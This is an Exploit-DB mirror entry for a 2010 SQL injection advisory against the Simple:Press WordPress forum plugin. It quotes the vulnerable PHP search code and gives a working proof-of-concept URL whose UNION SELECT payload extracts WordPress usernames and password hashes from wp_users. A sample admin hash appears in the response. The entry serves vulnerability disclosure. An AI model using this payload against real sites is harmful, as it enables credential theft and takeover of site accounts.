bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/14198.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

113 lines
No EOL
3.2 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Title: Simple:Press Wordpress Plugin SQL Injection Vulnerability
# Author: ADEO Security
# Published: 03/07/2010
# Version: v4.3.0 (Possible all versions)
# Vendor: http://simple-press.com
# Download: http://simple-press.com/download-manager.php?id=228
# Description: "Simple:Press the feature rich, completely integrated
and fully scaleable forum plugin for WordPress.
Highly customisable, Simple:Press packs the features of a standalone
forum into a plugin seamlessly turning your WordPress site into a
community."
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr
# Vulnerability:
In the search field, search values not filtered and inserted into sql
queries without using any quotes/single quotes and Simple:Press
execute this sql queries.
sf-header-forum.php
---[snip]---
385 # Add Search Vars
386 if(isset($_GET['search']))
387 {
388 if($_GET['search'] != '') $sfvars['searchpage'] =
sf_esc_int($_GET['search']);
389 if(isset($_GET['value']) ? $sfvars['searchvalue'] =
stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] =
'');
390 if(isset($_GET['type']) ? $sfvars['searchtype'] =
sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1);
400 if(isset($_GET['include']) ? $sfvars['searchinclude'] =
sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1);
401 if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1;
402 if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1;
403 } else {
---[snip]---
At the line 389, HTTP GET Request "value" defined as global variable
$sfvars['searchvalue'] with filtering functions that stripslashes()
and urldecode() but they can't secure it because in the
sf-database.php file the global variable $sfvar['searchvalue']
inserted into sql query without any quotes/single quotes.
sf-database.php
---[snip]---
...
401 $searchvalue=urldecode($sfvars['searchvalue']);
...
404 if($sfvars['searchtype'] == 6)
...
409 $ANDWHERE = " AND topic_status_flag=".$sfvars['searchvalue']." ";
410
411 } elseif($sfvars['searchtype'] == 8)
...
414 $userid = $sfvars['searchvalue'];
415 $SELECT = "SELECT SQL_CALC_FOUND_ROWS DISTINCT ";
416 $MATCH = "";
417 $ANDWHERE = " AND ".SFPOSTS.".user_id=".$userid." ";
418
419 } elseif($sfvars['searchtype'] == 9)
...
422 $userid = $sfvars['searchvalue'];
...
425 $ANDWHERE = " AND ".SFTOPICS.".user_id=".$userid." ";
...
---[snip]---
Its successfully exploitable with search types 6,8,9. Please see # PoC section.
# PoC:
Request: http://server/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2
Response: Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo.
(0 Matches Found)
================================
Exploit-DB Notes:
================================
Tested platform:
* Ubuntu Linux version 2.6.32-22-generic (buildd@palmer) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) )
* PHP5 + Apache2 + Mysql
* Latest version of Wordpress
* Simple:Press version=v4.2.2 (as of 07/05/2010 vendor still provides v4.2.2)
* Settings: Magic_Quotes = off; Global variables = On
Reference in a new issue View git blame Copy permalink